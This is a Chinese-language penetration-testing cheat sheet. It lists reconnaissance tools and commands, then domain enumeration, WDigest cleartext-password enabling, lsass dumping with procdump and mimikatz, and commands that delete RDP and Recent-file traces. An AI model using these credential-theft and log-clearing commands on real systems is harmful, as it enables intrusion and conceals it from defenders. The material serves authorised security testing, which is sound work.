文章目录
0X01web渗透测试
信息收集
子域名扫描
-
在线扫描
https://phpinfo.me/domain/
-
子域名挖掘机 layer
-
oneforall
工具下载:https://github.com/shmilylty/OneForAll
系统指纹探测
将收集到到域名全部进行一遍指纹探测,从中找出一些明显使用CMS、OA系统、shiro、Fastjson等的站点
-
Ehole
下载地址:https://github.com/EdgeSecurityTeam/EHole 使用方法: ./Ehole-darwin -l url.txt //URL地址需带上协议,每行一个 ./Ehole-darwin -f 192.168.1.1/24 //支持单IP或IP段,fofa识别需要配置fofa密钥和邮箱 ./Ehole-darwin -l url.txt -json export.json //结果输出至export.json文件
-
Glass
下载地址:https://github.com/s7ckTeam/Glass 使用方法: python3 Glass.py -u http://www.examples.com // 单url测试 python3 Glass.py -w domain.txt -o 1.txt // url文件内
端口扫描
- nmap
C段查询
fofa查询:
ip="61.187.92.229/24" && status_code="200"
fofa gui:
https://github.com/wgpsec/fofa_viewer
目录扫描
-
dirsearch
下载地址:https://github.com/maurosoria/dirsearch 使用方法 python3 dirsearch.py -u www.xxx.com -e * -t 2 //线程为2
-
御剑
JS信息收集
在一个站点扫描了目录、尝试登录失败并且没有自己注册功能的情况下,我们还可以从JS文件入手,获取一些URL,也许某个URL便能够未授权访问获取敏感信息呢。
-
JSFinder
介绍:JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具 工具下载:https://github.com/Threezh1/JSFinder
-
JS文件
介绍: 对于渗透测试来说,JS文件不仅仅能够找到一些URL、内网IP地址、手机号、调用的组件版本等信息,还存在一些接口,因为前端需要,所以一些接口将会在JS文件中直接或间接呈现 发现方法:Application Frames->top->Scripts中能够获取当前页面请求到的所有JS
0x0x其他
nc工具监听端口
格式:nc -l -p 80
讲解:监听本机的TCP80端口
查看信任域
nltest /domain_trusts
定位域控机器
nltest /dclist:domainname
查看某指定域内SPN信息
setspn -T 域名 -q */*
AD Explorer
介绍:域内一款信息查询工具,能够列出域组织架构等,以域普通用户连接即可
在域内机器可以直接利用ADExplorer执行如下命令将域信息导出成.dat文件格式
ADExplorer.exe -snapshot "" result.dat /accepteula
导出来后使用ADExplorerSnapshot.py解析
python3 ADExplorerSnapshot.py result.dat -o result
非域内机器用用gui
SocksCap代理
FRP可以代理全端口、全流量的数据,这样我们就可以使用SocksCap或者Proxifier等工具进行连接。
Ladon扫描器
地址:https://gitee.com/mstir/Ladon/ https://github.com/k8gege/Ladon
Ladon for Windows、Ladon GUI、Ladon for Cobalt Strike、Ladon for PowerShell、Python Ladon、Ladon for Linux
清理3389日志
//删除注册表
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"//删除缓存文件cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
清理recent日志
del /f /s /q “%userprofile%\Recent*.*
BBscan-漏洞扫描器
介绍:
有些朋友手上有几十万甚至上百万个域名,如果把这些域名全部扔给wvs、 APPscan这样的重型扫描器,显然是不太合适的。对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢?试试信息泄漏批量扫描BBscan
注意要用python2运行
下载:
Wdigest Auth 保存明文口令
reg add HKLM\SYSTEM\CurrentControlSet\ControlSecurity\Providers\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改注册表需要重启,或者注销账号重新登录。
procdump导 lsass.exe密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe读取lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
http状态码
403 服务器理解请求客户端的请求,但是拒绝执行此请求
404 所请求的页面不存在、已被删除或无法访问
500 服务器内部错误,无法完成请求
kali生成社工字典
-
cupp
安装:apt-get install cupp 使用:cupp -h 查看帮助
-
cewl
cewl是kali自带的脚本工具 cewl是通过爬取网站的时候,根据爬取内容的关键字生成一份字典,通过这种方式生成的字典可以作为cupp生成字典的补充
web信誉
Web信誉服务是通过趋势科技分布在全球的大量数据库服务器,来对存在于网络中的各种Web站点进行主动扫描和分析,从而对Web做出可靠的安全等级评估的一项方案措施。这个安全等级评估的分值将取决于Web站点的历史存在情况、安全漏洞隐患等因素。
通过ip反查计算机名
nmap --script nbstat -iL "C:\Users\panwu\Desktop\test\nmap.txt"